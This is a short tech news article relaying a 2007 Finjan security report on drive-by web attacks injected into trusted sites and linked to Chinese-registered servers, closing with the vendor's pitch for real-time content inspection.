Skip to main content

Increased Malicious Activity Coming Out of China

Finjan Inc. announced important findings by its Malicious Code Research Center (MCRC) which have identified increased malicious activity coming out of China recently. Finjan has examined the attacks and the mechanisms involved in executing them, and found an intricate network of connections between Chinese-based servers whose main purpose is to conduct criminal activity. Finjan have discovered that the entry points that initiate the attack on users "in the wild" exist all over the world and all are eventually associated with servers that are registered as Chinese domains.

The attackers are spreading their attacks by placing the entry points for the attack on a variety of websites, located in different regions and categorized differently by URL categorization engines. The infection consists of either an IFRAME or a SCRIPT tag being placed on the website that causes the users visiting the site to be attacked.

Examples for such entry point regions are shown in the December 2007 Malicious Page of the Month Report and were found on trusted websites in the USA, China, and Western Europe, including Government and Education sites.

After the victim reaches an entry point, the attackers use dynamic code obfuscation methods to limiting signature-based technologies from detecting the attack and the victim is redirected to a series of sites containing iframes that will eventually force the victim to visit a site that belongs to the Chinese network. In the first part of the actual malicious attack, the attackers are using known, as well as new, exploits that will infect the victim with a Crimeware-Trojan.

After the initial Trojan is loaded it initiates the downloading of other Trojans from different locations. The victim's compromised computer will now redirect to other sites in order to send statistical information about the infected PC. Finjan have discovered that different Trojans send encoded information to the same sites (located in China) that we identified as being unique to the attack. For more details including actual examples of these sophisticated attacks based out of China and Central Asia, download (opens in new tab)the December 2007 Malicious Page of the Month Report from

"Signature-based and database-driven technologies like Anti-virus and URL filtering are limited against the types of attacks we discovered, as the number of vectors and sophisticated structure of the network of websites can bypass traditional information security technologies." said Finjan CTO Yuval Ben-Itzhak, "Signature-based solutions are finding it hard to deal with the fact that most of the code is obfuscated and changed frequently.

URL classification-based solutions will find it hard to block an attack that is triggered from legitimate sites, such as government or academic domains. The recommended methodology for handling these modern security threats is to inspect the actual content in real-time, regardless of its source, domain name, and the way it looks.

To prevent these attacks organization should add real-time content inspection technology that blocks browsing to one of these infected sites after correctly identifying that they carry malicious code that attempts to exploit a vulnerability."

Désiré Athow

Désiré has been musing and writing about technology during a career spanning four decades. He dabbled in website building and web hosting when DHTML and frames were en vogue and started writing about the impact of technology on society just before the start of the Y2K hysteria at the turn of the last millennium. Following an eight-year stint at where he discovered the joys of global tech-fests, Désiré now heads up TechRadar Pro. Previously he was a freelance technology journalist at Incisive Media, Breakthrough Publishing and Vnunet, and Business Magazine. He also launched and hosted the first Tech Radio Show on Radio Plus.